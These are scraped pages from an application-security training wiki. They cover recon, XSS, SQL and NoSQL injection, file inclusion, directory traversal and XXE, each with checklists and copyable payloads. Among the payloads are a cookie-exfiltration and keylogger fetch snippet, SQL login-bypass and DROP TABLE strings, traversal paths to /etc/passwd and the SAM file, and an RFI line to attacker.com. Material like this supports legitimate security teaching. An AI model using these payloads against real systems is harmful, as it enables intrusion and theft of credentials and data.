[](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#security-control-analysis) Security Control Analysis * Authentication methods * Authorization schemes * Input validation * Output encoding * Security headers * Rate limiting #### [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#integration-points) Integration Points * Third-party services * Payment gateways * Social media * External APIs * SSO providers * Webhooks #### [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#documentation) Documentation * Architecture diagrams * API documentation * Error messages * Security policies * Known vulnerabilities * Previous findings #### [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#continuous-discovery) Continuous Discovery * Monitor for new subdomains * Track technology changes * Document new endpoints * Update attack surface map * Review scope changes * Track discovered vulnerabilities Other things we may consider: * How are sessions handled? * Is it worth looking more closely at the data flow? [PreviousResource of the week](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week) [NextContent discovery / recon](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon) Last updated 1 year ago Was this helpful? * [Things we want to find out](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#things-we-want-to-find-out) * [Part 1: Apex domains, subdomains, applications and technologies](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#part-1-apex-domains-subdomains-applications-and-technologies) * [Part 2: Application attack surface](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#part-2-application-attack-surface) * [Checklist](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#checklist) * [Part 1: Initial Discovery](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#part-1-initial-discovery) * [Part 2: Application Analysis](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#part-2-application-analysis) Was this helpful? --- # JavaScript injection (XSS) | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/javascript-injection-xss.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/javascript-injection-xss#what-is-it) What is it? ------------------------------------------------------------------------------------------------------------------------ Commonly known as cross-site scripting (XSS), JavaScript injection is where an attacker can inject arbitrary JavaScript to be executed. **A simple example** * A vulnerable webapp allows users to post comments. * When a user submits a comment, the website stores it and then displays it on the homepage without any validation or sanitization. * An attacker could exploit this by posting `` to the site. * When a user visits the homepage, the payload is executed in that users browser. **Other learning resources:** * PortSwigger: [https://portswigger.net/web-security/cross-site-scripting](https://portswigger.net/web-security/cross-site-scripting) * OWASP: [https://owasp.org/www-project-web-security-testing-guide/v42/4-Web\_Application\_Security\_Testing/07-Input\_Validation\_Testing/README](https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/README) **Writeups:** * Bullets [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/javascript-injection-xss#checklist) Checklist --------------------------------------------------------------------------------------------------------------------- * Is your input reflected in the response? * Can we inject HTML? * Are there any weaknesses in the Content Security Policy (CSP)? * Can we use events (e.g. onload, onerror)? * Are there any filtered or escaped characters? * Is your input stored and then later rendered? * Can you inject into non-changing values (e.g. usernames)? * Is any input collected from a third party (e.g. account information)? * Is the version of the framework or dependency vulnerable? [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/javascript-injection-xss#exploitation) Exploitation --------------------------------------------------------------------------------------------------------------------------- [PreviousNoSQL injection](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/nosql-injection) [NextXSS Methodology](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/javascript-injection-xss/xss-methodology) Last updated 2 years ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/javascript-injection-xss#what-is-it) * [Checklist](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/javascript-injection-xss#checklist) * [Exploitation](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/javascript-injection-xss#exploitation) Was this helpful? Copy alert(1) prompt(1) Copy Copy let cookie = document.cookie let encodedCookie = encodeURIComponent(cookie) fetch("https:///e?c=" + encodedCookie) Copy function logKey(event){ fetch("http:///e?c=" + event.key) } document.addEventListener('keydown', logKey); --- # SQL injection overview | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview#what-is-it) What is it? ---------------------------------------------------------------------------------------------------------------------- SQL injection is where an attacker is able to manipulate database queries made by an application. **A simple example** * A vulnerable web application has the endpoint `/search?product={productName}` * When a request is made, the application uses SQL to search for the product `SELECT * FROM products WHERE name=$productName` * If an attacker inserts a payload into `{productName}` such as `anything' UNION SELECT password FROM users WHERE username = 'admin` that modifies the query, sensitive data could be leaked. * The vulnerable application sends this query to the database and the database returns the admin's password. It's important to note that a payload or attack may change depending on the application, the query, and the database. SQL injection can often lead to: * Sensitive data exposure * Data manipulation * Remote code execution * Denial of service **Other learning resources:** * PostSwigger: [https://portswigger.net/web-security/sql-injection](https://portswigger.net/web-security/sql-injection) * Swisskeyrepo: [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection) **Writeups:** * [https://infosecwriteups.com/how-i-found-multiple-sql-injections-in-5-minutes-in-bug-bounty-40155964c498](https://infosecwriteups.com/how-i-found-multiple-sql-injections-in-5-minutes-in-bug-bounty-40155964c498) _Have a good writeup & want to share it here? Drop me a message on LinkedIn._ [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview#checklist) Checklist ------------------------------------------------------------------------------------------------------------------- * What is the technology stack you're attacking? * What application/framework is being used * What backend DB is being used * Is there an ORM? * Verify injection points * URL parameters * Form fields * HTTP headers (e.g. cookies, etc) * Out-of-band (e.g. data retrieved from a third party) * Test ' and " * Can you trigger an error? * Can you trigger a different response? * Test with SQLmap * Test for login bypass `' and 1=1-- -` etc * Test for blind SQLi * Test for errors * Test for conditional responses * Test for conditional errors * Test for time delays * Test for out-of-band interactions * Test for NoSQL injection * Is there a blocklist? * Can you bypass the blocklist? * Encoding * Double encoding * Alternative characters * Alternative payloads * Test for second-order SQLi [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview#exploitation) Exploitation ------------------------------------------------------------------------------------------------------------------------- [PreviousSpidering](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/spidering) [NextDetection](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection) Last updated 2 years ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview#what-is-it) * [Checklist](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview#checklist) * [Exploitation](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview#exploitation) Was this helpful? Copy # Basic login bypass ' AND 1=1# Copy # UNION SELECT ' UNION SELECT null,null FROM users-- - Copy # Blind ' AND SUBSTR((SELECT version()),1,1)='7'# CAST((SELECT example_column FROM example_table) AS int) --- # NoSQL injection | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/nosql-injection.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/nosql-injection#what-is-it) What is it? --------------------------------------------------------------------------------------------------------------- NoSQL injection is where an attacker can manipulate the queries made to a NoSQL database through user input. **A simple example:** * A vulnerable web application has the endpoint /search?user={username} * When a request is made, the application queries a NoSQL database (e.g., MongoDB) like this: `db.users.find({username: {$eq: username}})` * If an attacker inserts a payload into {username} such as {"$ne": ""}, it may modify the query to retrieve all users. * The vulnerable application sends this query to the database, potentially leaking all usernames. It's important to note that payloads may vary depending on the database, query, and application. NoSQL injection can lead to: * Sensitive data exposure * Data manipulation * Denial of service **Other learning resources:** **Writeups:** _Have a good writeup & want to share it here? Drop me a message on LinkedIn._ [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/nosql-injection#checklist) Checklist: ------------------------------------------------------------------------------------------------------------- * What is the technology stack you're attacking? * What NoSQL DB is being used (MongoDB, CouchDB, etc.)? * Verify injection points: * URL parameters * Form fields * HTTP headers (e.g., cookies, etc.) * Out-of-band (data retrieved from a third party) * Test with different operators: $eq, $ne, $gt, $gte, $lt, $lte, etc. * Can you trigger different responses? * Test for login bypass: {"$ne": ""} * Test for blind NoSQLi * Test for errors * Test for conditional responses * Test for conditional errors * Test for time delays * Test for out-of-band interactions * Is there a blocklist? * Can you bypass the blocklist? [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/nosql-injection#exploitation) Exploitation ------------------------------------------------------------------------------------------------------------------ [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/nosql-injection#references-and-resources) References & Resources ---------------------------------------------------------------------------------------------------------------------------------------- [![Logo](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2Fowasp.org%2Fwww--site-theme%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=7ea297a&sv=2)WSTG - Latest | OWASP Foundationowasp.org](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection) OWASP WSTG - Testing for NoSQL [![Logo](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2Fportswigger.net%2Fcontent%2Fimages%2Flogos%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=cbff289f&sv=2)NoSQL injection | Web Security AcademyWebSecAcademy](https://portswigger.net/web-security/nosql-injection) PortSwigger NoSQL Injection [PreviousSQLi lab setup & writeups](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups) [NextJavaScript injection (XSS)](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/javascript-injection-xss) Last updated 1 year ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/nosql-injection#what-is-it) * [Checklist:](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/nosql-injection#checklist) * [Exploitation](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/nosql-injection#exploitation) * [References & Resources](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/nosql-injection#references-and-resources) Was this helpful? Copy # basic login bypass {"username": "anyname", "password": {"$ne": ""}} Copy # retrieve data {"$where": "this.someField == 'someValue'"} Copy # blind {"someField": {"$regex": "^someValue"}} --- # XSS Methodology | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/javascript-injection-xss/xss-methodology.md) . 1. **Discovery and Mapping:** * Enumerate all endpoints, parameters, and user inputs. * Identify entry points such as query parameters, request bodies, and HTTP headers. 2. **Generate Test Inputs:** * Use a unique value for each entry point. * Inject these values to observe if and how they're reflected or stored. 3. **Submit and Observe:** * Submit the test inputs to all identified entry points. * Monitor both the immediate and subsequent HTTP responses for reflection or persistence of the input data. 4. **Context Analysis:** * Analyse where and how the input is reflected or stored in the application. * Pay attention to the surrounding HTML, JavaScript, or attribute context to craft effective payloads. 5. **Crafting XSS Payloads:** * Create payloads suitable for the identified contexts. * Alternatively use a pre-made list. 6. **Payload Testing:** * Fuzz with the crafted payloads. * For reflected XSS, test if the payload is reflected in the immediate response. * For stored XSS, check if the payload persists in storage and is executed in subsequent responses. * For DOM-based XSS, examine the source and trace the flow to any sinks in the DOM, then test payloads that interact with these sinks. 7. **Browser Execution:** * Execute the payloads in a browser to verify script execution. * Use simple JavaScript like `prompt(document.domain)` to test for execution. 8. **Document Reflections and Payload Execution:** * Document the precise location and context of each reflected, stored, or DOM-based input. * Take note of successful payloads and their outcomes. 9. **Exploit Refinement:** * If the initial payloads are blocked or sanitized, refine them by using different encodings or obfuscation techniques. * Consider all possible filter bypass techniques based on the application's behavior. 10. **Automated Scanning:** * Use automated scanning tools to identify potential XSS vulnerabilities. However, manual confirmation is necessary, as automated tools can generate false positives and negatives. 11. **Test for Browser Quirks:** * Test how different browsers interpret the payloads. Some browsers may encode or decode inputs differently, affecting payload delivery. 12. **Confirm Persistent Storage (Stored XSS):** * Verify that the payload is stored and executed across sessions or different user accounts, confirming a stored XSS vulnerability. 13. **Check for Execution Context (DOM-based XSS):** * For DOM-based XSS, use browser developer tools to check how the payload is handled by the browser's JavaScript engine. [PreviousJavaScript injection (XSS)](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/javascript-injection-xss) [NextFile Inclusion](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion) Last updated 2 years ago Was this helpful? Was this helpful? --- # Blind SQLi | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/blind-sqli.md) . ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/blind-sqli#blind-sql-injection) Blind SQL Injection Blind SQL injection (Blind SQLi) is a type of SQL injection attack where the attacker can exploit the database, but the application does not display the output. Instead, the attacker must "infer" data by sending payloads and observing the application's behavior or responses. **A simple example:** * A vulnearble webapp uses an API for its search to return the number of results found. * A user searches for a product, and the application returns with "X products found" without displaying product details. * The application uses the SQL query `SELECT COUNT(*) FROM products WHERE product_name LIKE '%{searchTerm}%'`. * An attacker could exploit this by injecting SQL conditions into the `{searchTerm}`. * For exmaple, searching for `laptop' AND 1=1-- -` returns "1 product found" and searching for `laptop' AND 1=2-- -` returns "0 products found", this behavior can be an indicator of a potential Blind SQLi vulnerability. Blind SQLi is more time-consuming than regular SQLi but is just as dangerous. It can lead to: * Sensitive data exposure * Data manipulation * Authentication bypass * Potential discovery of hidden data ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/blind-sqli#other-learning-resources) Other learning resources: * OWASP: https://owasp.org/www-community/attacks/Blind\_SQL\_Injection * SQLmap's guide on Blind SQLi: http://sqlmap.org/ * PenTestMonkey's Cheat Sheet: http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/blind-sqli#writeups) Writeups: ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/blind-sqli#checklist) Checklist: * Identify potential vulnerable points: * URL parameters * Form fields * HTTP headers (e.g. cookies, user-agent) * Hidden fields * Test for true/false conditions: * Can you get a "true" condition? E.g., `' AND 1=1-- -` * Can you get a "false" condition? E.g., `' AND 1=2-- -` * Time-based Blind SQLi: * Introduce artificial delays using functions like `SLEEP()` or `BENCHMARK()` * Measure response times * Error-based Blind SQLi: * Test a divide by zero payload * Can we trigger an error message? * Can we use `CAST()` to trigger an error and view the data? * Content-based Blind SQLi: * Check for changes in page content based on payloads * Out-of-band (OAST): * Can we trigger a DNS query? * Can we append some data to the subdomain of the URL to exfiltrate information? * Binary search based extraction: * Exploit faster by dividing data and querying * Backend specifics: * Are you dealing with MySQL, MSSQL, Oracle, PostgreSQL, SQLite? * Adjust your payloads accordingly * Test with automated tools: * SQLmap with `--technique=B` flag * Encoding and obfuscation: * Test with URL encoding, hex encoding, or other methods to bypass filters * Bypassing filters: * Use comments, spaces, or alternative syntax * Exploitation: * Extract database version, e.g., `AND (SELECT SUBSTRING(version(),1,1))='5'` * Fetch data character by character * Extract data from information\_schema [PreviousDetection](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/detection) [NextSecond-order SQLi](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/second-order-sqli) Last updated 2 years ago Was this helpful? * [Blind SQL Injection](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/blind-sqli#blind-sql-injection) * [Other learning resources:](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/blind-sqli#other-learning-resources) * [Writeups:](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/blind-sqli#writeups) * [Checklist:](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/blind-sqli#checklist) Was this helpful? --- # File Inclusion | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion#what-is-it) What is it? -------------------------------------------------------------------------------------------------------------- File Inclusion vulnerabilities allow an attacker to include files on a server through the web browser. This can occur in two forms: Local File Inclusion (LFI) and Remote File Inclusion (RFI). LFI exploits enable attackers to read files on the server, while RFI allows attackers to execute arbitrary code by including remote files over the internet. **A simple example** * A vulnerable web application has the endpoint /page?file={filename} * When a request is made, the application dynamically includes the content of the file specified in the query parameter, for example, PHP's include() function: include($filename); * If an attacker modifies {filename} to a path such as `../../etc/passwd` or a remote URL `http://attacker.com/malicious.php`, they can read sensitive files or execute malicious code. It's important to note that the specific impact and exploitation techniques can vary depending on server configuration, programming language, and application logic. File Inclusion vulnerabilities can lead to: * Sensitive data exposure * Remote code execution * Cross-site scripting **Other learning resources:** * \[To be updated\] **Writeups:** Have a good writeup & want to share it here? Drop me a message on LinkedIn. [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion#checklist) Checklist ----------------------------------------------------------------------------------------------------------- * What is the technology stack you're attacking? * What server-side language is being used (PHP, JSP, ASP, etc.) * Is the application running on a standard web server (Apache, Nginx, IIS)? * Identify potential injection points * URL parameters * Form fields * HTTP headers (e.g., Referer, User-Agent) * Test for Local File Inclusion (LFI) * Can you access local files? (e.g., ../../../etc/passwd) * Test with common Unix and Windows paths * Test for null byte injection (e.g., ../../../etc/passwd%00) * Test for Remote File Inclusion (RFI) * Can you include remote files? (e.g., http://attacker.com/malicious.php) * Test for protocol wrappers (e.g., php://, data://) * Is user input properly validated and sanitized? * Are only allow-listed files allowed to be included? * Is the application configured to disallow remote file inclusion? [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion#exploitation-some-code) Exploitation// Some code --------------------------------------------------------------------------------------------------------------------------------------- [PreviousXSS Methodology](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/javascript-injection-xss/xss-methodology) [NextLocal file inclusion](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion) Last updated 2 years ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion#what-is-it) * [Checklist](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion#checklist) * [Exploitation// Some code](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion#exploitation-some-code) Was this helpful? Copy # Basic LFI to read /etc/passwd ../../../../etc/passwd Copy # RFI to execute a remote shell http://attacker.com/malicious.php Copy # Using PHP wrappers to bypass restrictions php://filter/convert.base64-encode/resource=index.php --- # Second-order SQLi | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/second-order-sqli.md) . ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/second-order-sqli#second-order-sql-injection) Second-order SQL Injection Second order SQL injection (also known as Stored SQL Injection) occurs when user input is first stored in the database, and later used without being validated or encoded. The injection opportunity occurs in the second operation, hence the name "second order". **A simple example:** * A vulnerable webapp allows users to save their usernames. * An attacker can provide a malicious payload as their username, e.g. `jeremy'); DROP TABLE users;-- -` * Later, when the application tries to fetch the username for an operation (e.g., greeting a returning user), it executes the malicious payload. This type of attack can lead to: 1. Data loss or corruption. 2. Compromise of the database. 3. Sensitive data exposure. 4. Remote code execution. ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/second-order-sqli#other-learning-resources) Other learning resources: ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/second-order-sqli#writeups) Writeups: ### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/second-order-sqli#checklist) Checklist: [PreviousBlind SQLi](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/blind-sqli) [NextSQLi lab setup & writeups](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups) Last updated 2 years ago Was this helpful? * [Second-order SQL Injection](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/second-order-sqli#second-order-sql-injection) * [Other learning resources:](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/second-order-sqli#other-learning-resources) * [Writeups:](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/second-order-sqli#writeups) * [Checklist:](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/second-order-sqli#checklist) Was this helpful? --- # Spidering | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/spidering.md) . [PreviousParameters](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/parameters) [NextSQL injection overview](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview) Last updated 3 years ago Was this helpful? Was this helpful? --- # Server-side template injection | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection/server-side-template-injection.md) . [PreviousTemplate injection](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection) [NextClient-side template injection](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection/client-side-template-injection) Last updated 3 years ago Was this helpful? Was this helpful? --- # Directory traversal | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion/directory-traversal.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion/directory-traversal#what-is-it) What is it? ------------------------------------------------------------------------------------------------------------------------------------------------------- Directory Traversal, also known as Path Traversal, is a vulnerability that allows an attacker to read files on the victim’s system by manipulating file paths used in the application. **A simple example:** A vulnerable web application may have the endpoint /get\_file?path={filepath} When a request is made, the application returns the content of the specified file. If an attacker inserts a path into {filepath} such as ../../../etc/passwd, they might get access to the system files. The application then fetches this file, and if the file contents are sent in the response, the attacker can view sensitive system information. Remember that a payload or attack may change depending on the application and the server's file system. Directory Traversal can often lead to: * Sensitive data exposure * System information disclosure **Other learning resources:** PortSwigger: [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal) [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion/directory-traversal#checklist) Checklist ---------------------------------------------------------------------------------------------------------------------------------------------------- * What is the technology stack you're attacking? * What application/framework is being used? * Is it PHP, Java, Python, .NET, etc? * Verify injection points * URL parameters * Form fields * HTTP headers (e.g. cookies, etc) * Check if you can traverse to directories outside of the webroot: * ../../../../etc/passwd * ../../../../Windows/System32/config/SAM (Windows) * Is there a blocklist? * Is there a filter? * Is the filter recursive? * Is the filter on single characters or sets? (e.g. / vs ../) * Can you bypass the blocklist? * Is a specific extension required? * Can you read a sensitive file with allowed extensions? * Can you bypass with: * Null byte? %00 * Encoding * Double encoding * URL encoding * Unicode encoding * Test for log exposure * Can you read log files? * Other unexpected bypasses ../../ in the middle of the path [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion/directory-traversal#exploitation) Exploitation ---------------------------------------------------------------------------------------------------------------------------------------------------------- Basic directory traversal Reading application's own configuration files Log exposure Non-recursive filter bypass [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion/directory-traversal#tools) Tools -------------------------------------------------------------------------------------------------------------------------------------------- [![Logo](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=de04f0ca&sv=2)GitHub - wireghoul/dotdotpwn: DotDotPwn - The Directory Traversal FuzzerGitHub](https://github.com/wireghoul/dotdotpwn) [PreviousLocal file inclusion](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion) [NextCommand injection](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/command-injection) Last updated 2 years ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion/directory-traversal#what-is-it) * [Checklist](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion/directory-traversal#checklist) * [Exploitation](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion/directory-traversal#exploitation) * [Tools](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion/directory-traversal#tools) Was this helpful? Copy ../../../../etc/passwd Copy ../../webapp/config/database.ini Copy ../../../../var/log/apache2/access.log Copy ..././..././..././..././..././..././etc/passwd --- # Blind XXE | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection/blind-xxe.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection/blind-xxe#what-is-it) What is it? ------------------------------------------------------------------------------------------------------------------------------------------- Blind XML External Entity (XXE) vulnerabilities arise when an application processes XML input that includes references to an external entity, but does not return the outcome of the entity processing in the response. This makes the exploitation less direct since the attacker does not receive an immediate output from the injected payload. Blind XXE can be exploited to exfiltrate data, scan internal systems, or execute remote requests within the network that hosts the vulnerable application. [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection/blind-xxe#exploitation) Exploitation ---------------------------------------------------------------------------------------------------------------------------------------------- Blind XXE using OOB Copy ]> &xxe; Blind XXE using OOB with XML parameter entities Copy %xxe; ]> Solution[](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection/blind-xxe#solution) Copy 1. Check the stock of an item and send the POST request with XML to repeater 2. [PreviousXXE (XML external entity) injection](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection) [NextTemplate injection](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection) Last updated 2 years ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection/blind-xxe#what-is-it) * [Exploitation](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection/blind-xxe#exploitation) Was this helpful? --- # Client-side template injection | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection/client-side-template-injection.md) . [PreviousServer-side template injection](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/template-injection/server-side-template-injection) [NextAuthentication](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/authentication) Last updated 3 years ago Was this helpful? Was this helpful? --- # Local file inclusion | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion#what-is-it) What is it? ----------------------------------------------------------------------------------------------------------------------------------- Local File Inclusion (LFI) is a vulnerability that allows an attacker to read and sometimes execute files on the victim’s system. This could lead to revealing sensitive information or even remote code execution if handled poorly by the application. **A simple example:** * A vulnerable web application may have the endpoint /page?file={filename} * When a request is made, the application includes the specified file into the current script. * If an attacker inserts a path into {filename} such as ../../../etc/passwd, they might get access to the system files. * The application then includes this file, and if the file contents are outputted to the response, the attacker can view sensitive system information. It's important to note that a payload or attack may change depending on the application and the server's file system. LFI can often lead to: * Sensitive data exposure * Remote code execution * Server information disclosure **Other learning resources:** * PortSwigger: https://portswigger.net/web-security/file-path-traversal * PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/file-inclusion/local-file-inclusion#checklist) **Checklist** ------------------------------------------------------------------------------------------------------------------------------------ * What is the technology stack you're attacking? * What application/framework is being used? Is it PHP, Java, Python, .NET, etc? * Verify injection points * URL parameters * Form fields * HTTP headers (e.g. cookies, etc) * Try to include local files /etc/passwd /boot.ini (Windows) * Check for file protocol handlers file:// php://filter php://input data:// * Test for log poisoning * Can you inject input into log files? * Can you then include those log files? * Is there a blocklist? * Is there a filter? * Is the filter recursive? * Is the filter on single characters or sets? (e.g. `/` vs `../`) * Can you bypass the blocklist? * Is a specific extension required? * Can we include a sensitive file with allowed 